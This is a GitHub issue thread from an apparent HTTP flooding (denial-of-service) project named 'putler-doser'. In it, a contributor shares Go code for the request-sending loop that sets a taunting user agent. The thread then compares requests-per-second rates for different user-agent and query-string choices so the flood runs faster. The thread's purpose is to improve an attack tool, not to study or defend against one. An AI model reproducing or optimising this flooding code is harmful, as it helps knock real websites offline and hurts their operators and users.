### ISSUE TITLE
Change user agent "fasthttp" to something else?

### ISSUE THREAD

**Issue by scriptzteam** [metastck/putler-doser#7]
I see we use fasthttp, i am not good at golang but if you dont do it, i post here my code ( if i figure it out :D )

**Comment by scriptzteam** [comment]
Okay figured it out :D Idk if its the best way, but it works

Edit file [main.go](https://github.com/metastck/putler-doser/blob/master/main.go)
```
func sendRequest(host string) {
        req := fasthttp.AcquireRequest()
        req.SetRequestURI(host)
        req.Header.SetUserAgent("fUcK.pUtIn")
        res := fasthttp.AcquireResponse()

        err := client.Do(req, res)

        if err != nil {
                atomic.AddUint64(&errors, 1)
        }

        fasthttp.ReleaseRequest(req)
}
```

**Comment by scriptzteam** [comment]
Also it affect performance a lot, idk why?

Custom User Agent:
Successfull requests/s: 7276

fasthttp User Agent:
Successfull requests/s: 13974

----------
better way is to just modify query string and let User Agent as it is - fasthttp

fasthttp User Agent but added url query string **?fUcK.pUtIn** :
Successfull requests/s: 12044

**Comment by metastck** [comment]
I'm not sure how this would change anything. Are you sure it's not a coincidence?

**Comment by scriptzteam** [comment]
Idk too, but i stick with just query string to send a message :D
